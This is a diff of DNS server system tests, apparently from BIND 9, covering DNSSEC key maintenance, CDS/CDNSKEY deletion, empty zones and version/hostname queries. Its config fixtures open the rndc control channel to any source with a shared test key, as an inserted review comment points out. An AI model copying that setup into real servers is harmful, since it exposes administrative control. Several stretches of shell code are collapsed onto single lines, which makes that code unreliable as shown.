+$DIG $DIGOPTS @10.53.0.3 kskonly.example cds > dig.out.ns3.cdstest$n
+lines=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" {print}' dig.out.ns3.dnskeytest$n | wc -l)
+test ${lines:-0} -eq 1 || ret=1
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.ns3.cdnskeytest$n | wc -l)
+test ${lines:-0} -eq 1 || ret=1
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.ns3.cdstest$n | wc -l)
+test ${lines:-0} -eq 1 || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "setting CDS and CDNSKEY deletion times and calling 'rndc loadkeys'"
+$SETTIME -D sync now $(cat sync.key) > settime.out.test$n || ret=1
+($RNDCCMD 10.53.0.3 loadkeys sync.example | sed 's/^/ns3 /' | cat_i) || ret=1
+
+echo_i "checking that the CDS and CDNSKEY are deleted ($n)"
+ret=0
+ensure_cds_and_cdnskey_are_deleted() {
+ $DIG $DIGOPTS @10.53.0.3 sync.example. CDS > dig.out.ns3.cdstest$n || return 1
+ awk '$1 == "sync.example." && $4 == "CDS" { exit 1; }' dig.out.ns3.cdstest$n || return 1
+ $DIG $DIGOPTS @10.53.0.3 sync.example. CDNSKEY > dig.out.ns3.cdnskeytest$n || return 1
+ awk '$1 == "sync.example." && $4 == "CDNSKEY" { exit 1; }' dig.out.ns3.cdnskeytest$n || return 1
+}
+retry 10 ensure_cds_and_cdnskey_are_deleted || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "check that dnssec-settime -p Dsync works ($n)"
+ret=0
+$SETTIME -p Dsync $(cat sync.key) > settime.out.test$n || ret=1
+grep "SYNC Delete:" settime.out.test$n >/dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "check that dnssec-settime -p Psync works ($n)"
+ret=0
+$SETTIME -p Psync $(cat sync.key) > settime.out.test$n || ret=1
+grep "SYNC Publish:" settime.out.test$n >/dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "check that zone with inactive KSK and active ZSK is properly autosigned ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.3 axfr inacksk2.example > dig.out.ns3.test$n
+
+zskid=$(awk '$4 == "DNSKEY" && $5 == 256 { print }' dig.out.ns3.test$n |
+ $DSFROMKEY -A -2 -f - inacksk2.example | awk '{ print $4}' )
+pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${zskid} "
+grep "${pattern}" dig.out.ns3.test$n > /dev/null || ret=1
+
+kskid=$(awk '$4 == "DNSKEY" && $5 == 257 { print }' dig.out.ns3.test$n |
+ $DSFROMKEY -2 -f - inacksk2.example | awk '{ print $4}' )
+pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${kskid} "
+grep "${pattern}" dig.out.ns3.test$n > /dev/null && ret=1
+
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "check that zone with inactive ZSK and active KSK is properly autosigned ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.3 axfr inaczsk2.example > dig.out.ns3.test$n
+grep "SOA ${DEFAULT_ALGORITHM_NUMBER} 2" dig.out.ns3.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+#
+# Check that DNSKEY is now signed with the ZSK.
+#
+echo_i "check that zone with active and inactive KSK and active ZSK is properly"
+echo_ic "resigned after the active KSK is deleted - stage 2: Verify that DNSKEY"
+echo_ic "is now signed with the ZSK. ($n)"
+ret=0
+
+$DIG $DIGOPTS @10.53.0.3 axfr inacksk3.example > dig.out.ns3.test$n
+
+zskid=$(awk '$4 == "DNSKEY" && $5 == 256 { print }' dig.out.ns3.test$n |
+ $DSFROMKEY -A -2 -f - inacksk3.example | awk '{ print $4}' )
+pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${zskid} "
+grep "${pattern}" dig.out.ns3.test$n > /dev/null || ret=1
+
+count=$(awk 'BEGIN { count = 0 }
+ $4 == "RRSIG" && $5 == "DNSKEY" { count++ }
+ END {print count}' dig.out.ns3.test$n)
+test $count -eq 1 || ret=1
+
+count=$(awk 'BEGIN { count = 0 }
+ $4 == "DNSKEY" { count++ }
+ END {print count}' dig.out.ns3.test$n)
+test $count -eq 2 || ret=1
+
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+#
+# Check that zone is now signed with the KSK.
+#
+echo_i "check that zone with active and inactive ZSK and active KSK is properly"
+echo_ic "resigned after the active ZSK is deleted - stage 2: Verify that zone"
+echo_ic "is now signed with the KSK. ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.3 axfr inaczsk3.example > dig.out.ns3.test$n
+kskid=$(awk '$4 == "DNSKEY" && $5 == 257 { print }' dig.out.ns3.test$n |
+ $DSFROMKEY -2 -f - inaczsk3.example | awk '{ print $4}' )
+grep "CNAME ${DEFAULT_ALGORITHM_NUMBER} 3 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null || ret=1
+count=$(awk 'BEGIN { count = 0 }
+ $4 == "RRSIG" && $5 == "CNAME" { count++ }
+ END {print count}' dig.out.ns3.test$n)
+test $count -eq 1 || ret=1
+count=$(awk 'BEGIN { count = 0 }
+ $4 == "DNSKEY" { count++ }
+ END {print count}' dig.out.ns3.test$n)
+test $count -eq 2 || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking for out-of-zone NSEC3 records after ZSK removal ($n)"
+ret=0
+# Switch the zone over to NSEC3 and wait until the transition is complete.
+$RNDCCMD 10.53.0.3 signing -nsec3param 1 1 10 12345678 delzsk.example. > signing.out.1.test$n 2>&1 || ret=1
+for i in 0 1 2 3 4 5 6 7 8 9; do
+ _ret=1
+ $DIG $DIGOPTS delzsk.example NSEC3PARAM @10.53.0.3 > dig.out.ns3.1.test$n 2>&1 || ret=1
+ grep "NSEC3PARAM.*12345678" dig.out.ns3.1.test$n > /dev/null 2>&1
+ if [ $? -eq 0 ]; then
+ $RNDCCMD 10.53.0.3 signing -list delzsk.example > signing.out.2.test$n 2>&1
+ grep "Creating NSEC3 chain " signing.out.2.test$n > /dev/null 2>&1
+ if [ $? -ne 0 ]; then
+ _ret=0
+ break
+ fi
+ fi
+ sleep 1
+done
+if [ $_ret -ne 0 ]; then
+ echo_i "timed out waiting for NSEC3 chain creation"
+ ret=1
+fi
+# Mark the inactive ZSK as pending removal.
+file="ns3/$(cat delzsk.key).key"
+$SETTIME -D now-1h $file > settime.out.test$n || ret=1
+# Trigger removal of the inactive ZSK and wait until its completion.
+($RNDCCMD 10.53.0.3 loadkeys delzsk.example 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1
+for i in 0 1 2 3 4 5 6 7 8 9; do
+ _ret=1
+ $RNDCCMD 10.53.0.3 signing -list delzsk.example > signing.out.3.test$n 2>&1
+ grep "Signing " signing.out.3.test$n > /dev/null 2>&1
+ if [ $? -ne 0 ]; then
+ if [ $(grep "Done signing " signing.out.3.test$n | wc -l) -eq 2 ]; then
+ _ret=0
+ break
+ fi
+ fi
+ sleep 1
+done
+if [ $_ret -ne 0 ]; then
+ echo_i "timed out waiting for key removal"
+ ret=1
+fi
+# Check whether key removal caused NSEC3 records to be erroneously created for
+# glue records due to a secure delegation already being signed by the active key
+# (i.e. a key other than the one being removed but using the same algorithm).
+#
+# For reference:
+#
+# $ nsec3hash 12345678 1 10 ns.sub.delzsk.example.
+# 589R358VSPJUFVAJU949JPVF74D9PTGH (salt=12345678, hash=1, iterations=10)
+#
+$DIG $DIGOPTS delzsk.example AXFR @10.53.0.3 > dig.out.ns3.3.test$n || ret=1
+grep "589R358VSPJUFVAJU949JPVF74D9PTGH" dig.out.ns3.3.test$n > /dev/null 2>&1 && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "check that DNAME at apex with NSEC3 is correctly signed (auto-dnssec maintain) ($n)"
+ret=0
+$DIG $DIGOPTS txt dname-at-apex-nsec3.example @10.53.0.3 > dig.out.ns3.test$n || ret=1
+grep "RRSIG NSEC3 ${DEFAULT_ALGORITHM_NUMBER} 3 600" dig.out.ns3.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that DNAME is not treated as a delegation when signing ($n)"
+ret=0
+$DIG $DIGOPTS dname-and-txt.secure.example. DNAME @10.53.0.3 > dig.out.ns3.1.test$n || ret=1
+grep "dname-and-txt.secure.example.*RRSIG.*DNAME" dig.out.ns3.1.test$n > /dev/null 2>&1 || ret=1
+$DIG $DIGOPTS dname-and-txt.secure.example. TXT @10.53.0.3 > dig.out.ns3.2.test$n || ret=1
+grep "dname-and-txt.secure.example.*RRSIG.*TXT" dig.out.ns3.2.test$n > /dev/null 2>&1 || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking key maintenance events were logged correctly ($n)"
+ret=0
+pub=$(grep "DNSKEY .* is now published" ns1/named.run | wc -l)
+[ "$pub" -eq 6 ] || ret=1
+act=$(grep "DNSKEY .* is now active" ns1/named.run | wc -l)
+[ "$act" -eq 5 ] || ret=1
+rev=$(grep "DNSKEY .* is now revoked" ns1/named.run | wc -l)
+[ "$rev" -eq 1 ] || ret=1
+inac=$(grep "DNSKEY .* is now inactive" ns1/named.run | wc -l)
+[ "$inac" -eq 1 ] || ret=1
+del=$(grep "DNSKEY .* is now deleted" ns1/named.run | wc -l)
+[ "$del" -eq 1 ] || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that CDS (DELETE) persists after zone sign ($n)"
+echo_i "update add cds-delete.example. CDS 0 0 00"
+ret=0
+$NSUPDATE > nsupdate.out 2>&1 <<END
+server 10.53.0.3 ${PORT}
+zone cds-delete.example.
+update add cds-delete.example. 3600 CDS 0 0 0 00
+send
+END
+
+_cds_delete() (
+ $DIG $DIGOPTS +noall +answer $1 cds @10.53.0.3 > dig.out.ns3.test$n || return 1
+ grep "CDS.*0.*0.*0.*00" dig.out.ns3.test$n > /dev/null 2>&1 || return 1
+ return 0
+)
+_cdnskey_delete_nx() {
+ $DIG $DIGOPTS +noall +answer $1 cdnskey @10.53.0.3 > dig.out.ns3.test$n || return 1
+ grep "CDNSKEY.*0.*3.*0.*AA==" dig.out.ns3.test$n > /dev/null 2>&1 && return 1
+ return 0
+}
+
+echo_i "query cds-delete.example. CDS"
+retry_quiet 10 _cds_delete cds-delete.example. || ret=1
+echo_i "query cds-delete.example. CDNSKEY"
+retry_quiet 1 _cdnskey_delete_nx cds-delete.example. || ret=1
+
+echo_i "sign cds-delete.example."
+nextpart ns3/named.run >/dev/null
+$RNDCCMD 10.53.0.3 sign cds-delete.example > /dev/null 2>&1 || ret=1
+wait_for_log 10 "zone cds-delete.example/IN: next key event" ns3/named.run
+# The CDS (DELETE) record should still be here.
+echo_i "query cds-delete.example. CDS" +retry_quiet 1 _cds_delete cds-delete.example. || ret=1 +# The CDNSKEY (DELETE) record should still not be added. +echo_i "query cds-delete.example. CDNSKEY" +retry_quiet 1 _cdnskey_delete_nx cds-delete.example. || ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that CDNSKEY (DELETE) persists after zone sign ($n)" +echo_i "update add cdnskey-delete.example. CDNSKEY 0 3 0 AA==" +ret=0 +$NSUPDATE > nsupdate.out 2>&1 <<END +server 10.53.0.3 ${PORT} +zone cdnskey-delete.example. +update add cdnskey-delete.example. 3600 CDNSKEY 0 3 0 AA== +send +END + +_cds_delete_nx() ( + $DIG $DIGOPTS +noall +answer $1 cds @10.53.0.3 > dig.out.ns3.test$n || return 1 + grep "CDS.*0.*0.*0.*00" dig.out.ns3.test$n > /dev/null 2>&1 && return 1 + return 0 +) +_cdnskey_delete() { + $DIG $DIGOPTS +noall +answer $1 cdnskey @10.53.0.3 > dig.out.ns3.test$n || return 1 + grep "CDNSKEY.*0.*3.*0.*AA==" dig.out.ns3.test$n > /dev/null 2>&1 || return 1 + return 0 +} + +echo_i "query cdnskey-delete.example. CDNSKEY" +retry_quiet 10 _cdnskey_delete cdnskey-delete.example. || ret=1 +echo_i "query cdnskey-delete.example. CDS" +retry_quiet 1 _cds_delete_nx cdnskey-delete.example. || ret=1 + +echo_i "sign cdsnskey-delete.example." +nextpart ns3/named.run >/dev/null +$RNDCCMD 10.53.0.3 sign cdnskey-delete.example > /dev/null 2>&1 || ret=1 +wait_for_log 10 "zone cdnskey-delete.example/IN: next key event" ns3/named.run +# The CDNSKEY (DELETE) record should still be here. +echo_i "query cdnskey-delete.example. CDNSKEY" +retry_quiet 1 _cdnskey_delete cdnskey-delete.example. || ret=1 +# The CDS (DELETE) record should still not be added. +echo_i "query cdnskey-delete.example. CDS" +retry_quiet 1 _cds_delete_nx cdnskey-delete.example. 
|| ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "check removal of ENT NSEC3 records when opt out delegations are removed ($n)" +ret=0 +zone=optout-with-ent +hash=JTR8R6AVFULU0DQH9I6HNN2KUK5956EL +# check that NSEC3 for ENT is present +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.pre.ns2.test$n +grep "status: NOERROR" dig.out.pre.ns2.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.pre.ns2.test$n > /dev/null || ret=1 +grep "^${hash}.${zone}." dig.out.pre.ns2.test$n > /dev/null || ret=1 +# remove first delegation of two delegations, NSEC3 for ENT should remain. +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update del sub1.ent.$zone NS +echo send +) | $NSUPDATE +# check that NSEC3 for ENT is still present +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.pre.ns2.test$n +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.mid.ns2.test$n +grep "status: NOERROR" dig.out.mid.ns2.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.mid.ns2.test$n > /dev/null || ret=1 +grep "^${hash}.${zone}." dig.out.mid.ns2.test$n > /dev/null || ret=1 +# remove second delegation of two delegations, NSEC3 for ENT should be deleted. +( +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update del sub2.ent.$zone NS +echo send +) | $NSUPDATE +# check that NSEC3 for ENT is gone present +$DIG $DIGOPTS @10.53.0.2 a "ent.${zone}" > dig.out.post.ns2.test$n +grep "status: NXDOMAIN" dig.out.post.ns2.test$n >/dev/null || ret=1 +grep "ANSWER: 0, AUTHORITY: 4, " dig.out.post.ns2.test$n > /dev/null || ret=1 +grep "^${hash}.${zone}." dig.out.post.ns2.test$n > /dev/null && ret=1 +$DIG $DIGOPTS @10.53.0.2 axfr "${zone}" > dig.out.axfr.ns2.test$n +grep "^${hash}.${zone}." dig.out.axfr.ns2.test$n > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
diff --git a/bin/tests/system/builtin/clean.sh b/bin/tests/system/builtin/clean.sh
new file mode 100644
index 0000000..1ad33dc
--- /dev/null
+++ b/bin/tests/system/builtin/clean.sh
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ns?/named.run
+rm -f ns?/named.memstats
+rm -f ns?/named.conf
+rm -f rndc.status.ns*
+rm -f dig.out.ns*
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/builtin/ns1/named.conf.in b/bin/tests/system/builtin/ns1/named.conf.in
new file mode 100644
index 0000000..fd6569d
--- /dev/null
+++ b/bin/tests/system/builtin/ns1/named.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+};
diff --git a/bin/tests/system/builtin/ns2/named.conf.in b/bin/tests/system/builtin/ns2/named.conf.in
new file mode 100644
index 0000000..3275b06
--- /dev/null
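Review bot: The `controls` block in ns1/named.conf.in has no comment marking it as a test fixture, although it opens the rndc channel to every source with `allow { any; }` and authenticates with a key included from `../../common/rndc.key`. That key file is shared across the test suite and presumably committed with it, so it gives no secrecy. The listener is bound to 10.53.0.1, so real exposure depends on how that address is set up on the test host. I would add a comment above the block such as `/* test fixture only: control channel open to any source, rndc key is public; do not reuse outside the system tests */`. The same block, with only the address changed, appears in ns2/named.conf.in and ns3/named.conf.in and would take the same comment.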
+++ b/bin/tests/system/builtin/ns2/named.conf.in
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ server-id hostname;
+};
diff --git a/bin/tests/system/builtin/ns3/named.conf.in b/bin/tests/system/builtin/ns3/named.conf.in
new file mode 100644
index 0000000..acde3a5
--- /dev/null
+++ b/bin/tests/system/builtin/ns3/named.conf.in
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify no;
+ hostname "this.is.a.test.of.hostname";
+ server-id "this.is.a.test.of.server-id";
+ version "this is a test of version";
+};
diff --git a/bin/tests/system/builtin/setup.sh b/bin/tests/system/builtin/setup.sh
new file mode 100644
index 0000000..57e0575
--- /dev/null
+++ b/bin/tests/system/builtin/setup.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
diff --git a/bin/tests/system/builtin/tests.sh b/bin/tests/system/builtin/tests.sh
new file mode 100644
index 0000000..416b792
--- /dev/null
+++ b/bin/tests/system/builtin/tests.sh
@@ -0,0 +1,247 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +emptyzones=" +10.IN-ADDR.ARPA +16.172.IN-ADDR.ARPA +17.172.IN-ADDR.ARPA +18.172.IN-ADDR.ARPA +19.172.IN-ADDR.ARPA +20.172.IN-ADDR.ARPA +21.172.IN-ADDR.ARPA +22.172.IN-ADDR.ARPA +23.172.IN-ADDR.ARPA +24.172.IN-ADDR.ARPA +25.172.IN-ADDR.ARPA +26.172.IN-ADDR.ARPA +27.172.IN-ADDR.ARPA +28.172.IN-ADDR.ARPA +29.172.IN-ADDR.ARPA +30.172.IN-ADDR.ARPA +31.172.IN-ADDR.ARPA +168.192.IN-ADDR.ARPA +64.100.IN-ADDR.ARPA +65.100.IN-ADDR.ARPA +66.100.IN-ADDR.ARPA +67.100.IN-ADDR.ARPA +68.100.IN-ADDR.ARPA +69.100.IN-ADDR.ARPA +70.100.IN-ADDR.ARPA +71.100.IN-ADDR.ARPA +72.100.IN-ADDR.ARPA +73.100.IN-ADDR.ARPA +74.100.IN-ADDR.ARPA +75.100.IN-ADDR.ARPA +76.100.IN-ADDR.ARPA +77.100.IN-ADDR.ARPA +78.100.IN-ADDR.ARPA +79.100.IN-ADDR.ARPA +80.100.IN-ADDR.ARPA +81.100.IN-ADDR.ARPA +82.100.IN-ADDR.ARPA +83.100.IN-ADDR.ARPA +84.100.IN-ADDR.ARPA +85.100.IN-ADDR.ARPA +86.100.IN-ADDR.ARPA +87.100.IN-ADDR.ARPA +88.100.IN-ADDR.ARPA +89.100.IN-ADDR.ARPA +90.100.IN-ADDR.ARPA +91.100.IN-ADDR.ARPA +92.100.IN-ADDR.ARPA +93.100.IN-ADDR.ARPA +94.100.IN-ADDR.ARPA +95.100.IN-ADDR.ARPA +96.100.IN-ADDR.ARPA +97.100.IN-ADDR.ARPA +98.100.IN-ADDR.ARPA +99.100.IN-ADDR.ARPA +100.100.IN-ADDR.ARPA +101.100.IN-ADDR.ARPA +102.100.IN-ADDR.ARPA +103.100.IN-ADDR.ARPA +104.100.IN-ADDR.ARPA +105.100.IN-ADDR.ARPA +106.100.IN-ADDR.ARPA +107.100.IN-ADDR.ARPA +108.100.IN-ADDR.ARPA +109.100.IN-ADDR.ARPA 
+110.100.IN-ADDR.ARPA +111.100.IN-ADDR.ARPA +112.100.IN-ADDR.ARPA +113.100.IN-ADDR.ARPA +114.100.IN-ADDR.ARPA +115.100.IN-ADDR.ARPA +116.100.IN-ADDR.ARPA +117.100.IN-ADDR.ARPA +118.100.IN-ADDR.ARPA +119.100.IN-ADDR.ARPA +120.100.IN-ADDR.ARPA +121.100.IN-ADDR.ARPA +122.100.IN-ADDR.ARPA +123.100.IN-ADDR.ARPA +124.100.IN-ADDR.ARPA +125.100.IN-ADDR.ARPA +126.100.IN-ADDR.ARPA +127.100.IN-ADDR.ARPA +0.IN-ADDR.ARPA +127.IN-ADDR.ARPA +254.169.IN-ADDR.ARPA +2.0.192.IN-ADDR.ARPA +100.51.198.IN-ADDR.ARPA +113.0.203.IN-ADDR.ARPA +255.255.255.255.IN-ADDR.ARPA +0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA +1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA +D.F.IP6.ARPA +8.E.F.IP6.ARPA +9.E.F.IP6.ARPA +A.E.F.IP6.ARPA +B.E.F.IP6.ARPA +8.B.D.0.1.0.0.2.IP6.ARPA +EMPTY.AS112.ARPA +HOME.ARPA" + +n=`expr $n + 1` +ret=0 +count=0 +echo_i "Checking expected empty zones were configured ($n)" +for zone in ${emptyzones} +do + grep "automatic empty zone: $zone" ns1/named.run > /dev/null || { + echo_i "failed (empty zone $zone missing)" + ret=1 + } + count=`expr $count + 1` +done +lines=`grep "automatic empty zone: " ns1/named.run | wc -l` +test $count -eq $lines -a $count -eq 99 || { + ret=1; echo_i "failed (count mismatch)"; +} +if [ $ret != 0 ] ; then status=`expr $status + $ret`; fi + +n=`expr $n + 1` +echo_i "Checking that reconfiguring empty zones is silent ($n)" +$RNDCCMD 10.53.0.1 reconfig +ret=0 +grep "automatic empty zone" ns1/named.run > /dev/null || ret=1 +grep "received control channel command 'reconfig'" ns1/named.run > /dev/null || ret=1 +grep "reloading configuration succeeded" ns1/named.run > /dev/null || ret=1 +sleep 1 +grep "zone serial (0) unchanged." 
ns1/named.run > /dev/null && ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +echo_i "Checking that reloading empty zones is silent ($n)" +rndc_reload ns1 10.53.0.1 +ret=0 +grep "automatic empty zone" ns1/named.run > /dev/null || ret=1 +grep "received control channel command 'reload'" ns1/named.run > /dev/null || ret=1 +grep "reloading configuration succeeded" ns1/named.run > /dev/null || ret=1 +sleep 1 +grep "zone serial (0) unchanged." ns1/named.run > /dev/null && ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +HOST_NAME=`$FEATURETEST --gethostname` +BIND_VERSION_STRING=$($NAMED -V | head -1) +BIND_VERSION=$($NAMED -V | sed -ne 's/^BIND \([^ ]*\).*/\1/p') + +n=`expr $n + 1` +ret=0 +echo_i "Checking that default version works for rndc ($n)" +$RNDCCMD 10.53.0.1 status > rndc.status.ns1.$n 2>&1 +grep -F "version: $BIND_VERSION_STRING" rndc.status.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom version works for rndc ($n)" +$RNDCCMD 10.53.0.3 status > rndc.status.ns3.$n 2>&1 +grep -F "version: $BIND_VERSION_STRING (this is a test of version)" rndc.status.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that default version works for query ($n)" +$DIG $DIGOPTS +short version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "^\"$BIND_VERSION\"$" dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom version works for query ($n)" +$DIG $DIGOPTS +short version.bind txt ch @10.53.0.3 > dig.out.ns3.$n +grep "^\"this is a test of version\"$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 
+echo_i "Checking that default hostname works for query ($n)" +$DIG $DIGOPTS +short hostname.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "^\"$HOST_NAME\"$" dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that custom hostname works for query ($n)" +$DIG $DIGOPTS +short hostname.bind txt ch @10.53.0.3 > dig.out.ns3.$n +grep "^\"this.is.a.test.of.hostname\"$" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that default server-id is none for query ($n)" +$DIG $DIGOPTS id.server txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +n=`expr $n + 1` +ret=0 +echo_i "Checking that server-id hostname works for query ($n)" +$DIG 